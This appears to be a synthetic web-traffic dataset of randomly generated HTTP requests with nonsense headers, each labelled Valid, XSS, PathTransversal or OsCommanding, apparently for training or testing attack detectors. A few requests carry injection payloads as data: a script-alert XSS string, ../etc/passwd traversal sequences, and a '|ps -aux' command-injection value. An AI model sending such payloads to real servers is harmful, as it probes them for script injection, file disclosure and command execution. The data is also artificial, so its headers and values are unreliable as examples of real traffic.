GET /qocjQA.tf/PM1ZCq4Q99It9/mbTjhnsjim1gawn3O/bssn.asmx?9O0isstpX=154&M8G@=uC4d_xDd8&adminrNjJlocation=ik%5D8echoeelefHdw&exsi4e13onf=%3C9U&QN3EIsl3=hrovnoeelpsinauxgu&GrNistId=ry0jIYG&hpntaMsaOoi=r5YqyAy&bodyHxXperlRS=n7&ccoqg3teulnemn=oa5casqTlmotoeipr HTTP/1.0
Host: 155.53.170.168:80
Connection: close
Accept: audio/basic
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.8
Accept-Language: 5aOt-um;q=0.0, e5eg9i3-sa;q=0.4, pty-hs0nmie;q=0.9
Cache-Control: no-cache
Client-ip: 203.12.50.133
Cookie: et=17557283;vKN4s-JI0=57546068;6oSeTurhflRit=7684019
Cookie2: $Version="0"
Date: Sat, 28 May 05 11:28:51 CET
ETag: "3.I9kRFBydMo6wPbyXB"
Expect: opts
From: Hocan@osthutarg1.biz
If-Modified-Since: Sun, 25 Dec 05 24:57:04 CET
If-Unmodified-Since: Mon, 25 Jun 07 18:43:35 CET
If-Match: *
If-None-Match: "V0jN90yTJhyXtNWe5"
If-Range: Mon, 23 Apr 07 11:18:20 CET
Max-Forwards: 1758
MIME-Version: 8.3
Pragma: aet=Mht1oe7q
Proxy-Authorization: Digest username="jee7nf"
Authorization: etEds 6idhr=be9gu
Range: -515103
Referer: /Bhae/h1D49/brsq/eiec.js
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: 4ili/5.9.0.9.4
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0764x660
Via: HTTP/6.5 61.244.69.120
Transfer-Encoding: deflate
Upgrade: 3TN5i/2.0, ahqf9e/8.2, azaefr/2.4
Warning: 770 123.137.130.236 "6enewerc5oeejdr" "Tue, 23 Aug 05 16:07:21 CET"
X-Forwarded-For: 72.82.227.173
X-Serial-Number: 026545042
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 23117
Start - Id: 21976
class: Valid
GET /yIjostaXdoAldidasxm/dhueimIsntfn/hYQOrh/a0e/p3a1qSMkWsQrJabGzC/WS8etBrQ1/P4Nhwallhtpass0dkwp-kCMS/eT2s8v-Dbh/ieIcdgrnzr30ft/7AMJq/r@cfkwsbZ/nui.shtml?dhnlns40=66719723&tGg7c=D5l6a7et&htsitehdFxTt6=nrbPdsnd2iatIo&dr8qvNIiDaec=i_eUu&omsIxsobo1=Noi8r&gbAceoee=5689325&eocicEOhe2=e%26hee HTTP/1.0
Host: 89.143.51.129
Connection: kheh
Accept: video/mpeg;q=0.4, text/plain;q=0.7, video/*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, identity, compress, gzip
Accept-Language: N-esiHd7d0, tIb7f-ma, Tmolre1n-6i9gu2
Cache-Control: co='ui'
Client-ip: 3.169.52.148
Cookie: pao=ea;etut=ge7ddropm4
Cookie2: $Version="4"
Date: Tue, 16 Mar 10 09:00:38 CET
ETag: W/"zbRE9UbD3JaArpWa"
Expect: 100-continue
From: hso9@seTndeScl.it
If-Modified-Since: Sun, 16 Apr 06 07:13:42 GMT
If-Unmodified-Since: Fri, 13 Nov 09 15:20:06 GMT
If-Match: "2STBwOb9Z2bY._4knx"
If-None-Match: *
If-Range: *
Max-Forwards: 5222
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic Y3VkUzpocm5n
Authorization: Digest nc=B3739F87
Range: 2-874,8-,3113-623962
Referer: http://isenee.cz/ong2txy/010iwceo/heLtaa/zeoddce/roeia.cfm
TE: trailers,gzip,chunked
Trailer: Expect
User-Agent: natimipro/6.7
UA-CPU: MIPS
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0095x515
Via: 5.8 221.203.140.203, HTTP/5.8 145.56.52.55, 5.1 78.114.233.170:2
Transfer-Encoding: deflate
Upgrade: fysst/0.3
Warning: 225 83.153.240.145 "z2mns9" "Wed, 03 Nov 04 24:19:07 UTC"
X-Forwarded-For: 181.0.228.135
X-Serial-Number: 09176432061314
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21976
Start - Id: 29153
class: Valid
GET /rinbSrqusmonl9/ODBftpW/slTw3eoi7upioi/n8gO9ePc8Ws8Ic-a/QWyjsystemhuQmocha6/aszn/nnA9ILWq-5Zf2ag.Xl/Erclaou9Diwd/sakkiadf1pCa/o47UEGSld3-JZEzRj/oeOyecta1IethSe8d7Y/s7T8Iahee0fti4.exe? HTTP/1.0
Host: www.qsdfieaoi.com
Connection: close
Accept: audio/*, application/*, application/x-tar;q=0.5
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *
Cache-Control: min-fresh=81
Client-ip: 120.85.174.38
Cookie: 4mkrweoouent=3058176;a2cayyx=5628277537;akzlOcnIme8adi=eru
Cookie2: $Version="4"
Date: Wed, 03 Jan 07 21:03:59 GMT
ETag: "kay.WfhEQ8iXkgl"
Expect: 100-continue
From: espn@htNyusgoaB.com
If-Modified-Since: Sat, 06 Oct 07 16:39:47 CET
If-Unmodified-Since: Fri, 18 Nov 05 23:42:45 UTC
If-Match: "XVm11j.AE8c_P374e8kt"
If-None-Match: "a8-a4nRg8A8bQi1l"
If-Range: Sun, 18 Dec 05 08:59:39 UTC
Max-Forwards: 5470
MIME-Version: 6.1
Pragma: 5ee='cRsc'
Proxy-Authorization: r6cRja o1ns=aoel
Authorization: NTLM MmxXZWNyb3Rjb2F0emVlemVhdGlpb2JlbWF0b2RUaHBOc3Jya25ydA==
Range: 7756-,-27098
Referer: /tstrem.jpeg
TE: trailers,gzip
Trailer: User-Agent
User-Agent: Mozilla/4.9 (X11; U; SunOS sun4u 2.8; rt-qn; rv:4.2.3) Gecko/27046999
UA-CPU: PowerPC
UA-Disp: 758,7778,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0871x656
Via: 3.0 www.laiy3reE.htm, FTP/9.2 166.190.39.250
Transfer-Encoding: gzip
Upgrade: 8yqoe/8.0, a0aFi/4.0
Warning: 541 www.4a4g.htm "hsud1cbtsg" 
X-Forwarded-For: 97.58.176.102
X-Serial-Number: 59543
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29153
Start - Id: 47982
class: XSS
GET /eagddiuduoto/Oscb/g4GmxmeqDCyYKuT/dhtaccesW_GZV/DCEeo/PhjxC9zkuL/as.shtml?anreunszN=rela&DPBIQTreplacevbscript=lo&9Lk=%3Cscript++%3Ealert++%28%27g6atre4t.Ttadr1%27%29%3C%2Fscript+%3E&szfuenpE=2&lk=40724 HTTP/1.1
Host: 87.199.26.99
Connection: close
Accept: video/*;q=0.5, image/*, text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rrajHoEs-simterem, ieeC-meecehr;q=0.2, pan4fhw-bie9r
Cache-Control: no-cache
Client-ip: 200.176.81.45
Cookie: id6hre1Nsx=i9;oc3aR=soetorthkcnEg;bbgsoundPwinntmQobjectayu=4
Cookie2: $Version="140"
Date: Tue, 17 Apr 07 10:24:31 GMT
ETag: W/".PIa5x900H8gqvCc"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Fri, 14 May 04 10:06:30 UTC
If-Unmodified-Since: Thu, 22 Jun 06 21:32:45 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 8.2
Pragma: 3EtsTeto=nediHeN3
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Basic RGRldWVhOmRzek45
Range: 147-9,-924229,1-59450
Referer: http://www.eehea.net/hcti/tsth/Ewurtdtb/mf9t/do3aae.conf
TE: chunked;q=0.8,deflate;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/0.7 (compatible; Konqueror/1.3; Linux i386; qendEoeg; rgedesWoo)
UA-CPU: 68000
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 480x167
Via: 2.0 96.103.10.196, HTTP/7.7 194.94.15.215, FTP/9.1 31.201.81.96
Transfer-Encoding: gzip
Upgrade: ncS/0.9, oneft/1.4, g2ddat/1.2, wrNtr/6.4, r7ss/7.4
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 23.144.158.109
X-Serial-Number: 41529
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47982
Start - Id: 28355
class: Valid
GET /rQCfnQk4cG7s/.K/tAr.97gs9mNCR0M/dWpO.ybGiInf/ndhh/iWp7KNZah4Kct9LKdAOc/optzLA1j6/a_d-y7DOAN/4xienete/uuam4hshloyfnhe/ssei/t2IW2R92uwat.php?ozags=%7C0c5eomo-tulIo%3Dssxo&Oqservices.1xIb=49683674&ncwaa3ooireAsm=sun&9tc5w=nxl96HNFGvL&lld=47niortscriptnwhereIe%3Bah&Endni6ept0er=nQvOy&3i=cNT5bzWa7Coh&xTru=n+7+g&ior1iigiouf=6Plz HTTP/1.0
Host: 159.155.186.242
Connection: keep-alive
Accept: application/x-tar, application/*, application/zip
Accept-Charset: windows-1258;q=0.0, iso-8859-6;q=0.7, windows-1255;q=0.1
Accept-Encoding: *
Accept-Language: wxtunOi-ssac, ye-mel;q=0.6
Cache-Control: ttn=li9g
Client-ip: 47.222.40.20
Cookie: enHylai=3;TYiN=erofguainrdEdwE;ylyl2pnIc=6881953;dybEopaimYH=6oIo;hKTeprocessing-instruction=z88dT85.;snrbefrq=18
Cookie2: $Version="59"
Date: Thu, 03 Nov 05 14:57:28 UTC
ETag: W/"VMO.2@on4B-amFdJE@"
Expect: inivei1=ohsivzO;hrs5jpr
From: sszbHesr@flnNa.be
If-Modified-Since: Wed, 25 Mar 09 18:23:41 UTC
If-Unmodified-Since: Wed, 22 Jul 09 15:03:12 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 26 Sep 08 09:15:10 UTC
Max-Forwards: 826
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic dGVTNGE6VGZ0aA==
Authorization: Digest opaque="tkoN6a"
Range: 5-362340,-79,830-62
Referer: /tc3patmo/stahiyLY/stais.bin
TE: deflate;q=0.2,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.3 (compatible; 7akf5hyM; Mac OS X; er2s7Taoje; tfdlutd6t; d5maYp)
UA-CPU: StrongARM
UA-Disp: 547,716,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 6491x0728
Via: HTTP/0.5 104.226.96.99, 3.4 250.93.225.233
Transfer-Encoding: compress
Upgrade: mNe/8.8, ehIbla/4.3, s6oaa/4.9, cih/1.0
Warning: 976 163.70.1.255 "k7Tsaetaotwo" 
X-Forwarded-For: 156.99.87.237
X-Serial-Number: 3075652
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28355
Start - Id: 28958
class: Valid
GET /ozdh1yecwnxwnorjorn/u6eane8ti/tg7.jpeg?iwp-WKdocument=aowinzutowN3nuA0e&nlatf=3&mNt=9626842 HTTP/1.1
Host: www.ncn7.be:80
Connection: close
Accept: video/*;q=0.5, text/*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.7, gzip;q=0.8, compress;q=0.6, identity;q=0.0
Accept-Language: Rto-1tk, sugmai1-ddtA;q=0.4
Cache-Control: no-transform
Client-ip: 26.226.102.173
Cookie: elhl=eyturiydqutnnf;LZAfHFFmochanE=auhqeeawMTevld;xojm5swasmei=t;ai8elcb=5
Cookie2: $Version="30"
Date: Tue, 19 May 09 20:23:20 CET
ETag: "AlH_ZvVv78c5KA9P@U"
Expect: 100-continue
From: h5hrlh@Esuhia1.cz
If-Modified-Since: Mon, 08 Jun 09 23:29:41 UTC
If-Unmodified-Since: Thu, 02 Jun 05 20:30:47 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 6.8
Pragma: e=iK8to
Proxy-Authorization: NTLM czFjaGFhYm1ybnRoaWFlbWVzM2F0M2lsNm5jb2VhdGxhcnBmMWdpZWI=
Authorization: Digest nc=FAbBf1B9
Range: -332385,-432,1995-63
Referer: /peyAf.asp
TE: gzip;q=0.9,trailers,trailers
Trailer: Range
User-Agent: Mozilla/1.9 (Windows; U; WinNT 5.0; qi-2d; rv:1.9.6) Gecko/20261734
UA-CPU: MIPS
UA-Disp: 3550,9047,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1053x1221
Via: 9.7 50.180.138.135, HTTP/5.3 www.Tewri5ei.css:972, aiose/5.2 www.enqn1oo.shtml:104
Transfer-Encoding: compress
Upgrade: SDtt/0.6, mnhrp/9.3, edgePn/8.1
Warning: 060 221.176.165.132 "oh3respRbbacere" "Fri, 16 Mar 07 05:27:50 UTC"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 7184697
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 28958
Start - Id: 29700
class: Valid
GET /OS2%uAA21vnP3Iboot.ini/w3i.swf?Aj.QDvarWTngM=mybL HTTP/1.1
Host: 74.140.53.89
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: koi8;q=0.3, euc-kr;q=0.2, x-mac-ce;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 122.128.237.104
Cookie: lnmoeniHtO=45
Cookie2: $Version="9"
Date: Thu, 09 Dec 04 10:44:05 UTC
ETag: "GhVCu8H@TbsGDg7rOx"
Expect: gye0eTas
From: njg5eg@oAteadaav.fr
If-Modified-Since: Fri, 17 Mar 06 17:29:22 CET
If-Unmodified-Since: Mon, 02 Feb 04 14:43:24 UTC
If-Match: "dNrsOt1U7d@JCBrHTY"
If-None-Match: *
If-Range: "kPbJdNWRe41DY2hk"
Max-Forwards: 842
MIME-Version: 9.2
Pragma: esnsan=j5efrsdt
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: NTLM bW5zeWJjbnI3dG1lZG4wZkVoM2V4cG1obnRyZUFyaWtlUHJzRWVubA==
Range: -551432,8-
Referer: /f4toes/ihine/m9oa1Eue/tpeu7ay/mosksht.sh
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/4.7 (Windows; U; Windows NT 2.6; D2-nl; rv:8.0.6) Gecko/74322066
UA-CPU: MIPS
UA-Disp: 0427,819,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7452x2793
Via: FTP/4.8 www.aa1rhza.png, FTP/8.4 www.rixep.htm
Transfer-Encoding: deflate
Upgrade: vdqdss/4.7, wsibnl/9.2
Warning: 418 www.hcps.jpeg "st4ann" "Sat, 22 Sep 07 02:49:49 CET"
X-Forwarded-For: 25.252.143.178
X-Serial-Number: 149051815209
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29700
Start - Id: 36347
class: PathTransversal
GET /ue/oxoieM/oiyNEepgK58zSg8ctwss/he7ryftf/bHbSVlZl.css?dsin0Aa9lwOy=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&9n=qm3EeufhT&64lpmm=bd&easayThBEtqo=5228776975&ytzbLisoonjTsin=52&oLTvhtpassWOHE4G=4355982&2cs=opt HTTP/1.1
Host: www.huhNusee.be
Connection: close
Accept: text/xml;q=0.2, text/*, audio/basic;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ango9nb5-5yr, id4t6-e;q=0.6, Aem-saenriL;q=0.9, enoh-6hef;q=0.9
Cache-Control: max-age=0
Client-ip: 59.25.255.93
Cookie: e1nndsnh7gein=9srg46_RRT;laobjectn_9kZ2mN=ntcar;achrqYstdsoeais=3841;rnadhtAgetzen=oTrHahnaOarEsi;obghuvwcEftL=nne
Cookie2: $Version="405"
Date: Sat, 21 Jul 07 23:44:49 GMT
ETag: "cfqnbPK5k4tKX2_HzErM"
Expect: yIdnea=sctmien
From: sleras@7i3heoin.uk
If-Modified-Since: Sat, 27 May 06 19:44:21 GMT
If-Unmodified-Since: Wed, 20 Apr 05 06:26:59 GMT
If-Match: *
If-None-Match: "NA.hyK.v.iJ80NqR"
If-Range: *
Max-Forwards: 95
MIME-Version: 2.6
Pragma: j='sbtemria'
Proxy-Authorization: Basic YXVJbnM6ZWhpcjFndHU=
Authorization: taoyl eaenpa=isdee1bl
Range: 6-770122
Referer: http://www.uTNzonmi.org/gpsn/eiCAwsh.rar
TE: gzip,deflate,trailers
Trailer: From
User-Agent: Mozilla/3.8 (Machintosh; U; Mac OS X 6.1; wi-rm; rv:9.3.0) Gecko/39926045
UA-CPU: x86
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 636x8824
Via: 4.6 203.26.251.11:60966, 8.5 100.109.116.88, 5.1 248.34.23.48:6
Transfer-Encoding: gzip
Warning: 201 www.dreo.png "soaIbe7zmO" 
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36347
Start - Id: 43319
class: OsCommanding
GET /wjst2nrreswnmmcca4i/tU/Nfn4/udxH2@y/wtZi2oantunlatEd/2qxEy2nd08yM@NbIxt/sc@Av@I4GDy.ltoDEB8/otzeieathnvsriewnd/hhrngt9ei.shtml?2b87__S5alog=852&minaehv=%7Cps++-auxwww++++%3B&jEeiiont=eR6S8+efs+locatione7&Vamrhtbtoax=735&noei=hcteval&pvBhandUfF7=973795&hS0I=naaeio6u9paua&lue0Taaniut=331968 HTTP/1.1
Host: www.lsov.be
Connection: aentanne
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i4zeua-Uoenlti, reaqwds-hx4hrce;q=0.0, sitzq6i-nrN, Tuio-dmrdc, pgileir-4lie
Cache-Control: lrT=us
Client-ip: 170.237.233.234
Cookie: tet7oInoebuSs=yk4VgE;d9fs=aX0xpv7;toIfvs=imgej;fohiq=iimg we;lW=cbhnriTUwhwsiea;erg=jspMtPYsXf_
Cookie2: $Version="3"
Date: Thu, 12 Jun 08 07:08:52 UTC
ETag: "L6Op1aeDmT9K1KLGR"
Expect: trl2g=ErI0fhr
From: eTnr@war0.be
If-Modified-Since: Sat, 17 Dec 05 15:46:35 CET
If-Unmodified-Since: Tue, 02 Mar 04 24:52:39 CET
If-Match: *
If-None-Match: "SqtapM8htxOM8Ikn"
If-Range: Fri, 01 Apr 05 02:36:54 CET
Max-Forwards: 31
MIME-Version: 7.9
Pragma: 8uspr=1pixislo
Proxy-Authorization: NTLM aXlCUG5Zbm5ybXJ0aUZ6dG85SXdlaGVmZ2ZkaXVhZ2Rkdnlpb25saGJL
Authorization: eDloa hhEAnpe=aemiftda
Range: 2030-1
Referer: http://n8tvre.uk/2lcDnlie/ai2aast.cfm
TE: trailers,deflate,gzip
Trailer: Cache-Control
User-Agent: Mozilla/8.2 (Windows; U; WinNT 0.9; oo-7o; rv:8.5.1) Gecko/75824774
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3321x719
Via: FTP/9.5 www.cedud.css
Transfer-Encoding: tttnd
Upgrade: eCaleh/5.6, orv/6.7, AtlTSf/2.9, td7/4.6
Warning: 213 www.e6ttha.html:3574 "evi1u0aas9lO3ep" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 295019193
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43319
Start - Id: 26720
class: Valid
GET /ifvm8fFQe/zjs/slLsmDMpsnx/eMcBF/rcPyCl2YFg/-@UUscript37aC/ozl6E271dIGk2KzM/461M8X/1toartvhe7cagyynmsi/BKvOaKk9passwdObetweenp.msf? HTTP/1.0
Host: www.ihsuw.gov
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-2022-jp;q=0.1, iso-8859-8-i;q=0.0, x-mac-ce, utf-8;q=0.3, us-ascii;q=0.3
Accept-Encoding: identity;q=0.4, identity;q=0.2, compress, identity, compress;q=0.6
Accept-Language: *
Cache-Control: max-stale=5
Client-ip: 180.91.240.171
Cookie: mgm=omt2s;1goptMdORiQM=7o;9yoyyvtllTeTet=4564;9eEosystsnnfnhn=2;O9pmdRnha=8410
Cookie2: $Version="29"
Date: Mon, 31 Jul 06 02:55:37 GMT
ETag: "T8@J8mWCMvFmLewuG"
Expect: emaeoalh
From: i7Mua@nshie.it
If-Modified-Since: Tue, 28 Apr 09 04:19:13 GMT
If-Unmodified-Since: Tue, 14 Aug 07 14:27:52 UTC
If-Match: "iZPTmHp.gCcCFe@BtwP"
If-None-Match: *
If-Range: Sat, 29 Aug 09 22:50:31 UTC
Max-Forwards: 779
MIME-Version: 1.9
Pragma: ott4eD='nso'
Proxy-Authorization: NTLM eWh0bXVpdW9ubGV1YWhlZEVzbnREbnQ0cmdvbHRFZGhlaXNpYUF0eXJhbQ==
Authorization: Basic T3Ntc3RvOmRjb3NhZUhh
Range: 05-95,262898-811682
Referer: http://lfgon.fr/yslh/eePrexp.mspx
TE: gzip;q=0.3
Trailer: If-Match
User-Agent: rcdsRT6p/6.0.0.8
UA-CPU: StrongARM
UA-Disp: 221,658,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 873x2179
Via: HTTP/0.0 14.166.242.154:8242
Transfer-Encoding: ya58s
Upgrade: yer7e3/5.7
Warning: 653 www.rIlbwe.html:51762 "pn4htodnstaeHz" "Sat, 18 Dec 04 07:27:35 UTC"
X-Forwarded-For: 241.3.2.199
X-Serial-Number: 8174060600088
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26720
Start - Id: 46374
class: PathTransversal
GET /gmunwhDI6B/li/EtPl/4nmocha-zH54ElY/jetmgd1ptka/r7NNx_QXIt.php4?euetd=kpeata2N+tsptgl&a@uexeck9J=don9gwgUXB&BaOK6tCMgV=847&uj6inoltqteeI5=3088748371&formzBKs1xp=94496992&7raoeotSou=Y0esock_streamr&tiumouxuneTai=cF5Bv&6lntDodaokb=acemme&3t0qqQa=ibaO%5Dslhbltostyle&prquimhewe=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&AmobtEo=cv0s&4_EUlZu2rstyleS=dTT HTTP/1.0
Host: 10.141.71.84
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 86.247.207.18
Cookie: ts1ohnmp7N=c1;iid7tr9=(%uSchilde/j&(sm=+;62estslmgeNRan9=8379
Cookie2: $Version="86"
Date: Wed, 26 Mar 08 21:59:15 UTC
ETag: "GFsg.faK@trgN@CsoV"
Expect: aLad45hr=rfp3r;ngee=E8R2
From: cewts@1fgr.fr
If-Modified-Since: Thu, 05 Oct 06 16:33:05 GMT
If-Unmodified-Since: Sat, 12 Jan 08 21:14:00 UTC
If-Match: "kMla4HoPweULTAzJn"
If-None-Match: "pcMMfBcBpW4B.Uakz"
If-Range: "zOITDYoJbD-BDD6F"
Max-Forwards: 3
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: Digest uri=http://iYet.net/eeyag9.jpg
Range: 2-1818,846125-
Referer: /Hgvtp/lensHwS/widumwi.pdf
TE: trailers,trailers,chunked
Trailer: From
User-Agent: eeoertuHwclv
UA-CPU: StrongARM
UA-Disp: 4968,8587,8
UA-Color: color8
UA-Pixels: 3216x516
Via: HTTP/1.9 101.177.4.194, Iefdf/2.8 181.122.189.11, 7.4 116.127.38.140
Transfer-Encoding: compress
Upgrade: E10dna/7.5, ogsast/0.4, anph/7.5, chmt/4.9
Warning: 019 www.7IncbS.jpeg "Lwzurocdatoo" "Fri, 17 Apr 09 01:12:13 UTC"
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46374
Start - Id: 23126
class: Valid
GET /amxwAfXflbBo7CeT_0/pextwepn/laennsa/pEsRqXhIji/nsuyhgwmd/WjxMyASJQoY/hnVUadixNQQ3bqUqkFN/akIU/hUctlmt/46LqcnhjZZVy/sWEBAd2Jq1abO.php3?eNt=tAE7nio8doOao&ae28eihxcusYce=oe9obIl&bdzxrtgrn=mqeishutdownPetfromdglt%3A&ntrfnhb=304758078&qon5a=tfh&egwarsRr=o_Ow&kssrdd9cmdPepu=nme+pesrpassthrup2 HTTP/1.1
Host: 114.253.149.206
Connection: baohug
Accept: */*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: 23gMbee-fnlAri;q=0.6, ttieGaai-wobee7, lyim-0eql;q=0.3, eue-dPmo;q=0.7, nraul-u3rqnseF;q=0.0
Cache-Control: min-fresh=26
Client-ip: 111.184.188.213
Cookie: e3fglocationBdL9Q=-bO1eeaccess_logae2wuHts;b1sisRu=l%vol;deleteStmp4VSoE=87791
Cookie2: $Version="20"
Date: Thu, 10 Feb 05 03:28:08 CET
ETag: "3.I9kRFBydMo6wPbyXB"
Expect: 100-continue
From: xtisieil@oihdn.cz
If-Modified-Since: Thu, 10 Jul 08 11:29:31 GMT
If-Unmodified-Since: Sat, 24 Jul 04 04:26:58 CET
If-Match: "aZywrfMhAazN--6"
If-None-Match: *
If-Range: Thu, 08 Oct 09 20:15:28 CET
Max-Forwards: 2706
MIME-Version: 8.3
Pragma: eej=tso7s9ir
Proxy-Authorization: sreaa nzhdndbb=rDnD
Authorization: Basic cmVuZXJzYTpJZXRobjBp
Range: -515103
Referer: /jurui7/ho3aht/eneela.swf
TE: trailers,trailers
Trailer: Referer
User-Agent: ee6Ayggo41 (e7aVuKM; aje9qoEqy; 42F61P; dsfOeYLA0)
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0764x660
Via: HTTP/1.9 137.12.77.181, HTTP/9.4 www.ehphcIoy.gif, 6.7 172.10.161.73
Transfer-Encoding: t5e7
Upgrade: 3TN5i/2.0, ahqf9e/8.2, azaefr/2.4
Warning: 409 108.29.177.127:64647 "raeoofrtmfesue" 
X-Forwarded-For: 72.82.227.173
X-Serial-Number: 64536602678129
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 23126
Start - Id: 21070
class: Valid
GET /cl.png?ean=sWw5.Y&3teteteeot=yuD&pea=423&Kw-0R=559355&neehnecih=htsdeh%40lscedtbetweenhkofb%5B&isaeilTA118=97725301&IdmTAWPP=39372989 HTTP/1.1
Host: www.jeceeedi.be
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 44.233.163.187
Cookie: v3j=wTKYC;IevilosaEZaaPt3=in)jhcItTaPctatena
Cookie2: $Version="56"
Date: Sun, 20 Mar 05 19:04:04 CET
ETag: W/"ipwRsw15MI416@osrnl"
Expect: 100-continue
From: TcuGd@oto9w.com
If-Modified-Since: Sat, 24 Mar 07 01:33:07 CET
If-Unmodified-Since: Mon, 20 Jul 09 14:59:07 GMT
If-Match: "simLQSIHtvc6Vfh"
If-None-Match: *
If-Range: *
Max-Forwards: 6849
MIME-Version: 8.0
Pragma: wintort5='8ic'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic bmZ0c2Fwcjg6aG5wbmhTOA==
Range: 966923-49277,-9,672714-
Referer: /ho8x.js
TE: trailers
Trailer: TE
User-Agent: wlbopatIedacrneG
UA-CPU: 68000
UA-Disp: 708,2630,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 523x776
Via: HTTP/6.5 1.245.203.5:60, 5.3 www.luauor.css, ntse/5.7 145.228.31.205:85004
Transfer-Encoding: deflate
Upgrade: 7ynff/7.0
Warning: 713 12.247.43.52:5198 "etwniheaEussemp7n" "Tue, 07 Sep 04 10:12:42 UTC"
X-Forwarded-For: 204.19.242.253
X-Serial-Number: 650978480578430420
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21070
Start - Id: 7057
class: Valid
POST /j.1.bin? HTTP/1.1
Content-Length: 77
Content-Language: 4Bln4bmc
Content-Encoding: compress
Content-Location: http://anQg6tt.gov/itht/zsaRnl5n/igtoo.shtml
Content-MD5: c3RzOG9ZZ3VlYWZpaG1OYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Jun 04 13:50:35 CET
Last-Modified: Mon, 13 Nov 06 01:05:18 CET
Host: www.mloEoAtnay.com:80
Connection: tUcl
Accept: audio/x-wav;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.0, compress;q=0.8
Accept-Language: s2huk-dkc, eorrsEcw-nicDmn, 7lna-8umtiara
Cache-Control: min-fresh=81
Client-ip: 132.198.29.0
Cookie: ecofrtibwt0n=0148446;Unspg3rdeaa=e@;oNkO=rTz@1z;sct23tdofno=Xfw5oap
Cookie2: $Version="681"
Date: Sat, 02 Aug 08 24:04:50 GMT
